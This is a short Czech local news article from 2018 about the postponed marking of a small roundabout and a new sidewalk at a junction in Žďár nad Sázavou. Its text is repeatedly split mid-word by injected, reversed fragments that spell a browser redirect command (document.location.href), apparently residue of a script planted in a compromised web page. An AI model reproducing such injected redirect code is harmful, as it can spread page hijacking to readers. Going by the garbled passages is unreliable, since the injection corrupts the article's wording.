Rainbow page separator

Okružní křižovatka tří ulic bude vyznačena až v příštím roce

Pátek, 2. listopadu 2018

Žďár nad Sázavou / Až na příští rok bude přesunu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to řešení křižovatky ulic Wonkova, Studentská a Vysocká, kde se počítá se vznikem malé okružní křižovatky. Původně měla být provizorně vyznačena le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos, ale z důvodu úmrtí jednoho z účastníků výběrového řízení se záleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost zdržela. Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to chce při úpravě křižovatky také vybudovat nový chodník směřující od au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusové zastávky ve Wonkově ulici k ulici Studentská a rovněž místa k bezpečnému přecházení komunikace. Stavební práce, jež v první fázi zahrnou přeznačení křižovatky a výstavbu nového chodníku, by nijak výrazně neměly narušit provoz.
Na rok 2019 měl Kraj Vysočina naplánovanou celkovou rekonstrukci povrchu komunikace v ulici Vysocká, jež je krajskou silnicí II/353, takže pak měla městem vyznačená kruhová křižovatka dostat finální vzhled. I oprava krajské silnice procházející Vysockou ulicí se však s největší pravděpodobností o rok zpozdí.